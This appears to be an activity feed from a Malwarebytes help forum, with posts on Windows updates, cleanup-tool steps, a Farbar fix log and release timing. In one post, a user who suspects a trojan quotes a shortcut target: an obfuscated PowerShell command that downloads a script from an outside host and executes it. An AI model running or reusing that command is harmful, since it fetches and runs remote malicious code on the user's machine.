Jump to content

All Activity

This stream auto-updates     

  1. Past hour
  2. I have a shortcut launcher on my desktop I think it is a virus or trojan. Target properties are as follows: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy UnRestricted -Windo 1 $ag=[string][char[]]@(0x69,0x65,0x58) -replace ' ','';sal s $ag;$nq=((New-Object Net.WebClient)).DownloadString('http://shortbit.xyz/psp');s $nq I saw a previous post indicating it was a trojan. I followed the advice there and did a full scan, how can I tell if the trojan is active.
  3. If you want to manually install the 1903 update you can do it directly from the website https://www.microsoft.com/en-us/software-download/windows10 and click on Update Now You can also download the Media Creation tool, which will give you the choice to either install it now, or create a bootable media. In your case I would chose option 1 above, this way you can see the progress.
  4. You're quite welcome @Mike43 I'll go ahead and leave you with some further information to help keep your computer clean going forward. Let's get real. If you're not backing up your data and you're still using Google Chrome then you're just not serious about Privacy, Safety, and protecting your data. Malwarebytes is a fantastic program but you still need to back up your data and you still need to block scripts and Ads in your browser. If you're still using Google Chrome I would highly suggest you consider using Firefox instead. For more advanced users you might consider installing NoScript as well (it does have a higher learning curve though) Help Secure your browsers Please install uBlock Origin for your browsers to better protect your system FireFox, Chrome, Opera , Safari, Microsoft Edge AdBlock for Internet Explorer How to use uBlock Origin to protect your online privacy and security | uBlock Origin tutorial 2018 This video tutorial above explains how to use uBlock Origin in advanced user mode and all the advanced settings to protect your online privacy and help prevent unwanted sites from changing your browser settings Browser push notifications: a feature asking to be abused HTTPS Everywhere NOTHING TO HIDE documentary Review your email and Office choices Quit Gmail for free encrypted email - Tutanota Why ProtonMail Is More Secure Than Gmail LibreOffice - Free and open source office suite Use Password Management software Bitwarden KeePass Password Safe Encrypted Instant Messenger and Voice Calls Riot Signal Wickr Me Follow-up Reading Everything you need to know about cybercrime 10 easy ways to prevent malware infection Keep your data backed up Thank you for choosing Malwarebytes as your preferred security protection software and tell your friends and family too. We're here to help. I'll go ahead and close your topic soon, but if you do find you need further assistance please let us know and we can reopen your topic, or you can create a new one. Have a great weekend Ron
  5. Today
  6. Understood, Please contact our support team at https://support.malwarebytes.com/community/consumer/pages/contact-us to get help Ron
  7. WOW, that is what we call a fast response. First I want to thank you for the fast, precise, and easy to comprehend explication. 1 more thumbs up for MalwareByte. I have followed your suggestion and removed the extension, did a new scan with malwarebyte and everything seem to be alright Again thank you for your help
  8. @jdemoccc There is a one-click MBES -> MBEP migration tool coming soon but it is not yet ready.
  9. After running FRST the results are unchanged -- can't start mbam.exe with normal Windows boot but mbam.exe runs and scans OK if boot to safe mode + networking. With normal Windows boot I tried disabling all protections in my ESET security but no change. Below is the info from Fixlog.txt. ================================================================================================= Fix result of Farbar Recovery Scan Tool (x64) Version: 19-06-2019 Ran by dculp (20-06-2019 14:30:52) Run:3 Running from C:\FRST_Farbar Loaded Profiles: dculp (Available Profiles: dculp) Boot Mode: Normal ============================================== fixlist content: ***************** CreateRestorePoint: EmptyTemp: CloseProcesses: HKLM\...\Winlogon: [Shell] explorer.exe [2871808 2012-11-30] (Microsoft Windows -> Microsoft Corporation) HKLM-x32\...\Winlogon: [Shell] explorer.exe [2871808 2012-11-30] (Microsoft Windows -> Microsoft Corporation) SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = Toolbar: HKLM - No Name - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} - No File CHR StartupUrls: Default -> "hxxp://www.google.com/ig/redirectdomain?brand=CKMB&bmod=CKMB" CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - D:\Program files\Avast\WebRep\Chrome\aswWebRepChrome.crx <not found> CustomCLSID: HKU\S-1-5-21-1750345208-380253357-1962161537-1000_Classes\CLSID\{004B49B7-11B9-5058-AA22-08DD0A3ADC4B}\InprocServer32 -> {1F2776C4-9468-D082-92E6-56EE85889A47} => No File CustomCLSID: HKU\S-1-5-21-1750345208-380253357-1962161537-1000_Classes\CLSID\{004B49B7-11B9-5058-FF22-08DD093ADC4B}\InprocServer32 -> {1FBB964C-9468-D082-1A06-CAEE85889A47} => No File CustomCLSID: HKU\S-1-5-21-1750345208-380253357-1962161537-1000_Classes\CLSID\{DD0822AA-3A0A-4BDC-B749-4B00B9115850}\InprocServer32 -> {504A8032-9468-D082-6410-3BA185889A47} => No File CustomCLSID: HKU\S-1-5-21-1750345208-380253357-1962161537-1000_Classes\CLSID\{DD0822FF-3A09-4BDC-B749-4B00B9115850}\InprocServer32 -> {504A996F-9468-D082-3909-3BA185889A47} => No File ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Computer Aided Resonator Design (CARD).lnk -> F:\Temp2\CARD-14.31\CARD.BAT (No File) ***************** Restore point was successfully created. Processes closed successfully. HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell => value restored successfully HKLM\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell => value restored successfully HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => not found HKLM\Software\Classes\CLSID\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => not found HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => not found HKLM\Software\Wow6432Node\Classes\CLSID\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => not found "HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar\\{318A227B-5E9F-45bd-8999-7F8F10CA4CF5}" => not found HKLM\Software\Classes\CLSID\{318A227B-5E9F-45bd-8999-7F8F10CA4CF5} => not found "Chrome StartupUrls" => not found HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\gomekmidlodglbbmalcneegieacbdmki => not found HKU\S-1-5-21-1750345208-380253357-1962161537-1000_Classes\CLSID\{004B49B7-11B9-5058-AA22-08DD0A3ADC4B} => not found HKU\S-1-5-21-1750345208-380253357-1962161537-1000_Classes\CLSID\{004B49B7-11B9-5058-FF22-08DD093ADC4B} => not found HKU\S-1-5-21-1750345208-380253357-1962161537-1000_Classes\CLSID\{DD0822AA-3A0A-4BDC-B749-4B00B9115850} => not found HKU\S-1-5-21-1750345208-380253357-1962161537-1000_Classes\CLSID\{DD0822FF-3A09-4BDC-B749-4B00B9115850} => not found HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00asw => not found HKLM\Software\Classes\CLSID\{472083B0-C522-11CF-8763-00608CC02F24} => not found HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00avast => not found HKLM\Software\Classes\CLSID\{472083B0-C522-11CF-8763-00608CC02F24} => not found "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Computer Aided Resonator Design (CARD).lnk" => not found =========== EmptyTemp: ========== BITS transfer queue => 8388608 B DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 7772488 B Java, Flash, Steam htmlcache => 1088 B Windows/system/drivers => 12690 B Edge => 0 B Chrome => 0 B Firefox => 0 B Opera => 0 B Temp, IE cache, history, cookies, recent: Users => 0 B Default => 0 B Public => 0 B ProgramData => 0 B systemprofile => 128 B systemprofile32 => 0 B LocalService => 0 B NetworkService => 2494 B dculp => 145481436 B RecycleBin => 0 B EmptyTemp: => 154.2 MB temporary data Removed. ================================ The system needed a reboot. ==== End of Fixlog 14:33:21 ====
  10. I quite well agree that direct contact would be optimal, and would help avoid any problems in relaying information, and who knows, maybe talking to one of your people would get him off that dang McAffee and also on to MWB... I fear that trying to convince him to make a general post is not going to be met with much success. May i ask by what means i could have him contact your help-desk? Every time i have done so (and there have been more than several) it has been through a link within MWB-
  11. It restarted, should I open its file location and run it again?
  12. @sfrush way too soon to even guess. It ( 3.8.1.2950 ) [ or its successor ] has to be in a test period & then without any show stoppers outstanding. At least 7 to 10 days from now. If it is released, there will be an annoucenment at the very top of this sub-forum. Also, if your pc is running the Beta, it will automatically get notice of the release & the update.
  13. Okay, please see if Malwarebytes will run now and run the following 3 steps again. Please run the following steps and post back the logs as an attachment when ready. STEP 01 If you're already running Malwarebytes 3 then open Malwarebytes and check for updates. Then click on the Scan tab and select Threat Scan and click on Start Scan button. If you don't have Malwarebytes 3 installed yet please download it from here and install it. Once installed then open Malwarebytes and check for updates. Then click on the Scan tab and select Threat Scan and click on Start Scan button. Once the scan is completed click on the Export Summary button and save the file as a Text file to your desktop or other location you can find, and attach that log on your next reply. If Malwarebytes won't run then please skip to the next step and let me know on your next reply. STEP 02 Please download AdwCleaner by Malwarebytes and save the file to your Desktop. Right-click on the program and select Run as Administrator to start the tool. Accept the Terms of use. Wait until the database is updated. Click Scan Now. When finished, please click Clean & Repair. Your PC should reboot now if any items were found. After reboot, a log file will be opened. Copy its content into your next reply. RESTART THE COMPUTER Before running Step 3 STEP 03 Please download the Farbar Recovery Scan Tool and save it to your desktop. Note: You need to run the version compatible with your system. You can check here if you're not sure if your computer is 32-bit or 64-bit Double-click to run it. When the tool opens, click Yes to disclaimer. Press the Scan button. It will make a log (FRST.txt) in the same directory the tool is run. Please attach it to your reply. The first time the tool is run, it also makes another log (Addition.txt). If you've, run the tool before you need to place a check mark here. Please attach the Additions.txt log to your reply as well. Thanks Ron
  14. I see the Windows update assistant in my task manager far below and when I press check for update it shows I am up to date, would it be safe to assume it stopped and to restart?
  15. Hello @brucemc777 It really is best if your friend comes to the forum and signs up and starts his own new topic so that one of our Experts can provide direct one-on-one assistance. Going through a middle 3rd party will make fixing the computer nearly impossible. They can also contact our Helpdesk for support if wanted. Thanks Ron
  16. Sorry, stupid question. How do I know if I'm using Remote Desktop? The only computer-to-computer communication I do is between my desktop and my laptop and that is primarily (99%) through my own wireless network at the house. But a ton of my work and my software are in the cloud. Does it sound like I can disable RDP and block the 3389 port? Thank you both for the information.
  17. IMHO we should not have to contact Malwarebytes for this, it should be available in the my account portal where one manages their subscriptions.
  18. You should be able to restart the computer as long as no actual update is running. You can click Start, and type in Check for updates and see.
  19. I downloaded the update assistant and accidentally downsized it instead of pressing the downsize button on screen and don't see it anywhere on my screen or in my task bar, I'm not sure if it's still running but should I leave it be or open its file again if it stopped?
  20. coming soon to a computer near you... once its done being tested in the beta process, should not be too long.
  21. Anyone know when the official version for 3.8 will be released?
  22. I had this issue some time back where I had the license key + ID. In the end Support sent me a new lifetime key but one of the newer ones. So keep on them to get that as it is easier.
  1. Load more activity
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.